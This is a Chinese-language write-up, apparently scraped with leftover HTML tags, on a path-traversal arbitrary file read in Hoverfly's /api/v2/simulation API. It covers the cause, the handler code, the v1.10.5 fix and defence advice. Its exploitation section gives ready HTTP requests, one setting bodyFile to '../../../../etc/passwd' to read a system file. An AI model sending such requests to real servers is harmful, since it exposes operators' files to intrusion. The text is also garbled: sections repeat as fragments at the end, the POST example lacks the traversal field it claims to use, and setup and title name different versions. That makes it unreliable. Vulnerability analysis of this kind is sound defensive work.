Hoverfly v1.10.3 任意文件读取漏洞分析与利用<\/h1>

1. Hoverfly 简介<\/h2>

Hoverfly 是一个为开发人员和测试人员提供的轻量级服务虚拟化\/API模拟工具，具有以下特点：<\/p>

创建可重复使用的虚拟服务，在CI环境中替代缓慢和不稳定的外部或第三方服务<\/li>
模拟网络延迟、随机故障或速率限制以测试边缘情况<\/li>
支持多种编程语言扩展(Go, Java, Javascript, Python)<\/li>
提供REST API和命令行界面hoverctl<\/li>
使用Go编写，轻量级高性能<\/li>

多种运行模式：记录、回放、修改或合成HTTP响应<\/li> <\/ul>

2. 漏洞概述<\/h2>
Hoverfly v1.10.3 存在任意文件读取漏洞，攻击者可以通过`\/api\/v2\/simulation<\/code>接口读取服务器上的任意文件。<\/p>`

漏洞原理<\/h3>
Hoverfly的\/api\/v2\/simulation<\/code> POST处理程序允许用户从指定文件内容创建新的模拟视图。虽然代码禁止指定绝对路径，但攻击者可以通过..\/<\/code>路径遍历逃逸hf.Cfg.ResponsesBodyFilesPath<\/code>基本路径，从而访问任意文件。<\/p>
3. 环境搭建<\/h2>
使用Docker快速搭建测试环境：<\/p>
docker pull spectolabs\/hoverfly:v1.10.2
<\/span><\/span>docker run -d -p 8888:8888 -p 8500:8500 spectolabs\/hoverfly:v1.10.2
<\/span><\/span><\/code><\/pre>4. 漏洞分析<\/h2>
4.1 路由分析<\/h3>
漏洞位于hoverfly-1.10.2\/core\/handlers\/v2\/simulation_handler.go<\/code>文件中的RegisterRoutes<\/code>方法：<\/p>
func<\/span> (this<\/span> *<\/span>SimulationHandler<\/span>) RegisterRoutes<\/span>(mux<\/span> *<\/span>bone<\/span>.Mux<\/span>, am<\/span> *<\/span>handlers<\/span>.AuthHandler<\/span>) {
<\/span><\/span>    mux<\/span>.Get<\/span>("\/api\/v2\/simulation"<\/span>, negroni<\/span>.New<\/span>(
<\/span><\/span>        negroni<\/span>.HandlerFunc<\/span>(am<\/span>.RequireTokenAuthentication<\/span>),
<\/span><\/span>        negroni<\/span>.HandlerFunc<\/span>(this<\/span>.Get<\/span>),
<\/span><\/span>    ))
<\/span><\/span>    mux<\/span>.Put<\/span>("\/api\/v2\/simulation"<\/span>, negroni<\/span>.New<\/span>(
<\/span><\/span>        negroni<\/span>.HandlerFunc<\/span>(am<\/span>.RequireTokenAuthentication<\/span>),
<\/span><\/span>        negroni<\/span>.HandlerFunc<\/span>(this<\/span>.Put<\/span>),
<\/span><\/span>    ))
<\/span><\/span>    mux<\/span>.Post<\/span>("\/api\/v2\/simulation"<\/span>, negroni<\/span>.New<\/span>(
<\/span><\/span>        negroni<\/span>.HandlerFunc<\/span>(am<\/span>.RequireTokenAuthentication<\/span>),
<\/span><\/span>        negroni<\/span>.HandlerFunc<\/span>(this<\/span>.Post<\/span>),
<\/span><\/span>    ))
<\/span><\/span>    \/\/ 其他路由...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2 关键函数分析<\/h3>
PUT和POST方法都调用了addSimulation<\/code>函数，但参数不同：<\/p>
func<\/span> (this<\/span> *<\/span>SimulationHandler<\/span>) Put<\/span>(w<\/span> http<\/span>.ResponseWriter<\/span>, req<\/span> *<\/span>http<\/span>.Request<\/span>, next<\/span> http<\/span>.HandlerFunc<\/span>) {
<\/span><\/span>    err<\/span> :=<\/span> this<\/span>.addSimulation<\/span>(w<\/span>, req<\/span>, true<\/span>)  \/\/ overrideExisting=true
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> (this<\/span> *<\/span>SimulationHandler<\/span>) Post<\/span>(w<\/span> http<\/span>.ResponseWriter<\/span>, req<\/span> *<\/span>http<\/span>.Request<\/span>, next<\/span> http<\/span>.HandlerFunc<\/span>) {
<\/span><\/span>    err<\/span> :=<\/span> this<\/span>.addSimulation<\/span>(w<\/span>, req<\/span>, false<\/span>) \/\/ overrideExisting=false
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>addSimulation<\/code>函数调用链：

addSimulation<\/code> → PutSimulation<\/code> → putOrReplaceSimulation<\/code><\/p>
最终漏洞出现在hoverfly-1.10.2\/core\/hoverfly_funcs.go<\/code>文件中，关键问题是对filePath<\/code>参数缺乏充分校验。<\/p>
5. 漏洞利用<\/h2>
5.1 POST方法利用<\/h3>
POST方法只能读取一次文件内容，之后读取不会改变：<\/p>
POST<\/span> \/api\/v2\/simulation HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target:8888<\/span>
<\/span><\/span>Authorization:<\/span> Bearer [token]<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>    "data"<\/span>: {
<\/span><\/span>        "pairs"<\/span>: [
<\/span><\/span>            {
<\/span><\/span>                "response"<\/span>: {
<\/span><\/span>                    "status"<\/span>: 200<\/span>,
<\/span><\/span>                    "body"<\/span>: ""<\/span>,
<\/span><\/span>                    "encodedBody"<\/span>: false<\/span>,
<\/span><\/span>                    "headers"<\/span>: {},
<\/span><\/span>                    "templated"<\/span>: false<\/span>
<\/span><\/span>                },
<\/span><\/span>                "request"<\/span>: {
<\/span><\/span>                    "path"<\/span>: [
<\/span><\/span>                        {
<\/span><\/span>                            "matcher"<\/span>: "exact"<\/span>,
<\/span><\/span>                            "value"<\/span>: "\/test"<\/span>
<\/span><\/span>                        }
<\/span><\/span>                    ],
<\/span><\/span>                    "method"<\/span>: [
<\/span><\/span>                        {
<\/span><\/span>                            "matcher"<\/span>: "exact"<\/span>,
<\/span><\/span>                            "value"<\/span>: "GET"<\/span>
<\/span><\/span>                        }
<\/span><\/span>                    ],
<\/span><\/span>                    "destination"<\/span>: [
<\/span><\/span>                        {
<\/span><\/span>                            "matcher"<\/span>: "exact"<\/span>,
<\/span><\/span>                            "value"<\/span>: "test.com"<\/span>
<\/span><\/span>                        }
<\/span><\/span>                    ],
<\/span><\/span>                    "scheme"<\/span>: [
<\/span><\/span>                        {
<\/span><\/span>                            "matcher"<\/span>: "exact"<\/span>,
<\/span><\/span>                            "value"<\/span>: "http"<\/span>
<\/span><\/span>                        }
<\/span><\/span>                    ],
<\/span><\/span>                    "query"<\/span>: {},
<\/span><\/span>                    "body"<\/span>: [
<\/span><\/span>                        {
<\/span><\/span>                            "matcher"<\/span>: "exact"<\/span>,
<\/span><\/span>                            "value"<\/span>: ""<\/span>
<\/span><\/span>                        }
<\/span><\/span>                    ],
<\/span><\/span>                    "headers"<\/span>: {}
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>        ],
<\/span><\/span>        "globalActions"<\/span>: {
<\/span><\/span>            "delays"<\/span>: [],
<\/span><\/span>            "delaysLogNormal"<\/span>: []
<\/span><\/span>        }
<\/span><\/span>    },
<\/span><\/span>    "meta"<\/span>: {
<\/span><\/span>        "schemaVersion"<\/span>: "v5"<\/span>,
<\/span><\/span>        "hoverflyVersion"<\/span>: "v1.10.2"<\/span>,
<\/span><\/span>        "timeExported"<\/span>: "2025-01-24T04:45:00Z"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5.2 PUT方法利用<\/h3>
PUT方法可以重复利用，读取不同文件：<\/p>
PUT<\/span> \/api\/v2\/simulation HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target:8888<\/span>
<\/span><\/span>Authorization:<\/span> Bearer [token]<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>    "data"<\/span>: {
<\/span><\/span>        "pairs"<\/span>: [
<\/span><\/span>            {
<\/span><\/span>                "response"<\/span>: {
<\/span><\/span>                    "status"<\/span>: 200<\/span>,
<\/span><\/span>                    "bodyFile"<\/span>: "..\/..\/..\/..\/etc\/passwd"<\/span>,
<\/span><\/span>                    "encodedBody"<\/span>: false<\/span>,
<\/span><\/span>                    "headers"<\/span>: {},
<\/span><\/span>                    "templated"<\/span>: false<\/span>
<\/span><\/span>                },
<\/span><\/span>                "request"<\/span>: {
<\/span><\/span>                    "path"<\/span>: [
<\/span><\/span>                        {
<\/span><\/span>                            "matcher"<\/span>: "exact"<\/span>,
<\/span><\/span>                            "value"<\/span>: "\/test"<\/span>
<\/span><\/span>                        }
<\/span><\/span>                    ],
<\/span><\/span>                    "method"<\/span>: [
<\/span><\/span>                        {
<\/span><\/span>                            "matcher"<\/span>: "exact"<\/span>,
<\/span><\/span>                            "value"<\/span>: "GET"<\/span>
<\/span><\/span>                        }
<\/span><\/span>                    ],
<\/span><\/span>                    "destination"<\/span>: [
<\/span><\/span>                        {
<\/span><\/span>                            "matcher"<\/span>: "exact"<\/span>,
<\/span><\/span>                            "value"<\/span>: "test.com"<\/span>
<\/span><\/span>                        }
<\/span><\/span>                    ],
<\/span><\/span>                    "scheme"<\/span>: [
<\/span><\/span>                        {
<\/span><\/span>                            "matcher"<\/span>: "exact"<\/span>,
<\/span><\/span>                            "value"<\/span>: "http"<\/span>
<\/span><\/span>                        }
<\/span><\/span>                    ],
<\/span><\/span>                    "query"<\/span>: {},
<\/span><\/span>                    "body"<\/span>: [
<\/span><\/span>                        {
<\/span><\/span>                            "matcher"<\/span>: "exact"<\/span>,
<\/span><\/span>                            "value"<\/span>: ""<\/span>
<\/span><\/span>                        }
<\/span><\/span>                    ],
<\/span><\/span>                    "headers"<\/span>: {}
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>        ],
<\/span><\/span>        "globalActions"<\/span>: {
<\/span><\/span>            "delays"<\/span>: [],
<\/span><\/span>            "delaysLogNormal"<\/span>: []
<\/span><\/span>        }
<\/span><\/span>    },
<\/span><\/span>    "meta"<\/span>: {
<\/span><\/span>        "schemaVersion"<\/span>: "v5"<\/span>,
<\/span><\/span>        "hoverflyVersion"<\/span>: "v1.10.2"<\/span>,
<\/span><\/span>        "timeExported"<\/span>: "2025-01-24T04:45:00Z"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6. 漏洞修复<\/h2>
在Hoverfly v1.10.5中，官方增加了ResolveAndValidatePath<\/code>函数对路径进行校验：<\/p>
func<\/span> ResolveAndValidatePath<\/span>(absBasePath<\/span>, relativePath<\/span> string<\/span>) (string<\/span>, error<\/span>) {
<\/span><\/span>    \/\/ 确保相对路径不会尝试向上回溯(使用"..")
<\/span><\/span><\/span><\/span>    \/\/ 并验证解析后的路径仍然在基路径之下
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>该函数确保：<\/p>

相对路径不能包含..<\/code>进行路径遍历<\/li>
解析后的路径必须在基路径之下<\/li>
<\/ol>
7. 总结<\/h2>

漏洞类型：路径遍历导致的任意文件读取<\/li>
影响版本：v1.10.3及之前版本<\/li>
修复方案：升级到v1.10.5或更高版本<\/li>
利用方式：通过\/api\/v2\/simulation<\/code>接口的PUT或POST方法<\/li>
关键点：PUT方法可重复利用，POST方法只能读取一次<\/li>
<\/ol>
8. 防御建议<\/h2>

及时升级到最新版本<\/li>
对用户提供的文件路径进行严格校验<\/li>
实施最小权限原则，限制Hoverfly进程的文件系统访问权限<\/li>
在API网关层添加额外的输入验证<\/li>
<\/ol>

Hoverfly v1.10.3 任意文件读取漏洞分析与利用<\/h1>

2. 漏洞概述<\/h2> Hoverfly v1.10.3 存在任意文件读取漏洞，攻击者可以通过\/api\/v2\/simulation<\/code>接口读取服务器上的任意文件。<\/p>

4. 漏洞分析<\/h2>

8. 防御建议<\/h2> 及时升级到最新版本<\/li> 对用户提供的文件路径进行严格校验<\/li> 实施最小权限原则，限制Hoverfly进程的文件系统访问权限<\/li> 在API网关层添加额外的输入验证<\/li> <\/ol>

2. 漏洞概述<\/h2>
Hoverfly v1.10.3 存在任意文件读取漏洞，攻击者可以通过`\/api\/v2\/simulation<\/code>接口读取服务器上的任意文件。<\/p>`

8. 防御建议<\/h2>

及时升级到最新版本<\/li>
对用户提供的文件路径进行严格校验<\/li>
实施最小权限原则，限制Hoverfly进程的文件系统访问权限<\/li>
在API网关层添加额外的输入验证<\/li> <\/ol>